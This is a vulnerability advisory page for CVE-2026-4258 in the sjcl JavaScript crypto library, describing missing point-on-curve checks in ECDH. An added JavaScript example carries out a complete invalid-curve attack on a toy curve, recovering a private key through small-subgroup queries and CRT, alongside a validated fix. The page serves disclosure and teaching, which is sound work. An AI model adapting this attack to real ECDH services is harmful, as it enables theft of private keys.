CVE-2026-4258
7.5 HIGH. All versions of the package sjcl are vulnerable to Improper Verification of Cryptographic Signature due to missing point-on-curve validation in sjcl.ecc.basicKey.publicKey().
Published: 2026-03-17 · Last updated: 2026-06-03
Severity and scoring
- CVSS: 7.5 HIGH
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- CWE: CWE-325 (Missing Cryptographic Step), CWE-347 (Improper Verification of Cryptographic Signature)
Affected products
| Vendor | Product |
|---|---|
| bitwiseshiftleft | stanford_javascript_crypto_library |
Description
All versions of the package sjcl are vulnerable to Improper Verification of Cryptographic Signature due to missing point-on-curve validation in sjcl.ecc.basicKey.publicKey(): a public key can be built from coordinates that do not satisfy the curve equation, and nothing rejects it. This enables a classic invalid-curve attack on ECDH. The elliptic-curve point addition formulas depend only on the field prime and the coefficient a, not on b, so an attacker can send a point on a different curve y^2 = x^3 + ax + b' whose group order has a small prime factor r. The victim's scalar multiplication by its private key d then lands in a subgroup of order r, and the result reveals d mod r. Repeating this with several small primes and combining the residues with the Chinese Remainder Theorem recovers the victim's ECDH private key. The attack is especially cheap against dhJavaEc(), which returns the raw x-coordinate of the scalar multiplication result with no hashing: the attacker reads each residue directly from the output and needs no decryption feedback or other side channel. Hashing the shared secret would only raise the cost of the attack (the attacker would then need some success/failure feedback); the actual fix is to verify that every untrusted public key satisfies the curve equation, and has the expected order where the curve has a cofactor, before it is used in any scalar multiplication. Users should upgrade to a version containing the referenced patch commit.
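The attack described above, worked through end to end as an added example. This is not sjcl code and not the advisory's proof of concept: it uses a constructed toy curve y^2 = x^3 + A*x + B over GF(1009) so that point counting and subgroup search are instant, and its `unvalidatedDh()` mirrors only the behaviour the description attributes to dhJavaEc() (multiply an unchecked peer point by the private scalar, return the raw x-coordinate). All function and variable names are the example's own. `validatedDh()` shows the missing check.

```javascript
// Added example, not sjcl code: an invalid-curve attack against a toy ECDH whose
// key-agreement step behaves like the dhJavaEc() path described above (scalar
// multiplication of an unvalidated peer point, raw x-coordinate returned).
// Curve parameters are constructed for the demo: y^2 = x^3 + A*x + B over GF(P).
const P = 1009n, A = 2n, B = 3n;
const O = null; // point at infinity

const mod = (x, m) => ((x % m) + m) % m;
function modpow(b, e, m) {
  let r = 1n;
  for (b = mod(b, m); e > 0n; e >>= 1n, b = (b * b) % m) if (e & 1n) r = (r * b) % m;
  return r;
}
const inv = (x, m = P) => modpow(x, m - 2n, m); // m is prime

// Affine group law. B never appears: the formulas only involve A, so a point on
// some other curve y^2 = x^3 + A*x + B' is processed without complaint.
function add(p1, p2) {
  if (p1 === O) return p2;
  if (p2 === O) return p1;
  let l;
  if (p1.x === p2.x) {
    if (mod(p1.y + p2.y, P) === 0n) return O; // p1 = -p2 (includes doubling a 2-torsion point)
    l = mod((3n * p1.x * p1.x + A) * inv(2n * p1.y), P);
  } else {
    l = mod((p2.y - p1.y) * inv(p2.x - p1.x), P);
  }
  const x3 = mod(l * l - p1.x - p2.x, P);
  return { x: x3, y: mod(l * (p1.x - x3) - p1.y, P) };
}
function mult(k, pt) { // double-and-add
  let acc = O;
  for (let base = pt; k > 0n; k >>= 1n, base = add(base, base)) if (k & 1n) acc = add(acc, base);
  return acc;
}
const eq = (p1, p2) => (p1 === O || p2 === O ? p1 === p2 : p1.x === p2.x && p1.y === p2.y);
const isOnCurve = (pt, b) => pt === O || mod(pt.y * pt.y - pt.x ** 3n - A * pt.x - b, P) === 0n;

// Square-root table and point counting, cheap because P is tiny.
const roots = Array.from({ length: Number(P) }, () => []);
for (let y = 0n; y < P; y++) roots[Number((y * y) % P)].push(y);
const rhs = (x, b) => mod(x ** 3n + A * x + b, P);
function countPoints(b) { // #E(GF(P)) for y^2 = x^3 + A*x + b, infinity included
  let n = 1n;
  for (let x = 0n; x < P; x++) n += BigInt(roots[Number(rhs(x, b))].length);
  return n;
}
function primeFactors(n) {
  const out = [];
  for (let f = 2n; f * f <= n; f++) if (n % f === 0n) { out.push(f); while (n % f === 0n) n /= f; }
  if (n > 1n) out.push(n);
  return out;
}
function pointOfOrder(b, n, r) { // a point of exact prime order r on the curve with coefficient b
  for (let x = 0n; x < P; x++) {
    const ys = roots[Number(rhs(x, b))];
    if (ys.length === 0) continue;
    const q = mult(n / r, { x, y: ys[0] }); // Lagrange: its order divides r, so it is 1 or r
    if (q !== O) return q;
  }
  return null;
}

// Victim key pair on the real curve: G of prime order ORD_G, private scalar d < ORD_G.
const N_REAL = countPoints(B);
const ORD_G = primeFactors(N_REAL)[primeFactors(N_REAL).length - 1];
const G = pointOfOrder(B, N_REAL, ORD_G);
const d = (ORD_G + 1n) / 2n;
const pub = mult(d, G);

// Vulnerable: no on-curve check, raw x-coordinate returned (the dhJavaEc() behaviour).
function unvalidatedDh(peer) { const s = mult(d, peer); return s === O ? null : s.x; }
// Hardened: refuse any peer point that does not satisfy the real curve equation.
function validatedDh(peer) {
  if (peer === O || !isOnCurve(peer, B)) throw new Error('peer public key is not on the curve');
  return unvalidatedDh(peer);
}

// Attacker: walk through curves y^2 = x^3 + A*x + b, pull a point Q of prime order r
// from each, learn d mod r from x(d*Q), and combine the residues by CRT.
function invalidCurveAttack(oracle) {
  let cands = [0n], modulus = 1n;
  const used = new Set();
  for (let b = 0n; b < P && modulus <= ORD_G; b++) {
    if (b === B || mod(4n * A ** 3n + 27n * b * b, P) === 0n) continue; // skip real/singular curve
    const n = countPoints(b);
    for (const r of primeFactors(n)) {
      if (used.has(r) || modulus > ORD_G) continue;
      const Q = pointOfOrder(b, n, r);
      if (Q === null) continue;
      const leaked = oracle(Q); // x(d*Q) depends only on d mod r
      const res = [];
      for (let k = 0n; k < r; k++) {
        const kQ = mult(k, Q);
        if ((kQ === O ? null : kQ.x) === leaked) res.push(k); // x-only: k and r-k both match
      }
      cands = cands.flatMap(c => res.map(k => c + modulus * mod((k - c) * inv(modulus, r), r)));
      used.add(r);
      modulus *= r;
    }
  }
  // d is the smallest candidate that reproduces the public key (d < ORD_G).
  return cands.sort((u, v) => (u < v ? -1 : u > v ? 1 : 0)).find(c => eq(mult(c, G), pub));
}

console.log(`private d = ${d}, recovered = ${invalidCurveAttack(unvalidatedDh)}`);
```

Two points carry over to production code. First, the attacker never needs a point on the real curve: every query point lies on a curve that shares P and A with the victim's, which is why the on-curve test in `validatedDh()` (y^2 == x^3 + Ax + B over the field, plus rejecting the point at infinity) closes the hole. Second, because only the x-coordinate leaks, each query yields d mod r up to sign, so the attacker enumerates 2^m sign combinations after m queries and checks each against the public key; with real-sized private keys the cost is still dominated by the handful of subgroup queries, not by the final search. On a curve with a cofactor the check must also confirm the point's order (for example by multiplying by the subgroup order), since an on-curve point of small order leaks in the same way.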
Source: NVD
References
- [NVD] https://nvd.nist.gov/vuln/detail/CVE-2026-4258
- [Exploit reference] https://gist.github.com/Kr0emer/2560f98edb10b0b34f2438cd63913c47
- [Other] https://github.com/bitwiseshiftleft/sjcl/blob/master/core/ecc.js#L454-L461
- [Patch] https://github.com/bitwiseshiftleft/sjcl/commit/ee307459972442a17beebc29dc331fffd8aff796
- [Exploit reference] https://security.snyk.io/vuln/SNYK-JS-SJCL-15369617
Related CVEs
Same CWE
- CVE-2026-41694 — Since Spring Security SAML decrypts SAML Responses as well as elements of SAML LogoutRequests and LogoutResponses without requiring a val... (3.7 LOW)
- CVE-2026-45446 — Issue summary: The implementations of AES-SIV (RFC 5297) and AES-GCM-SIV (RFC 8452) mishandle the authentication of AAD (Additional Authe... (4.8 MEDIUM)
- CVE-2026-45445 — Issue summary: When an application drives an AES-OCB context through the public EVP_Cipher() one-shot interface, the application-supplied... (7.5 HIGH)
- CVE-2026-42770 — Issue summary: When EVP_PKEY_derive_set_peer() is called with a DHX (X9.42) peer key, the peer key is not properly checked for the subgro... (3.7 LOW)
- CVE-2026-0420 — An improper implementation of TLS certificate validation vulnerability found in ReadyCloud client app which can allow an attacker to perf...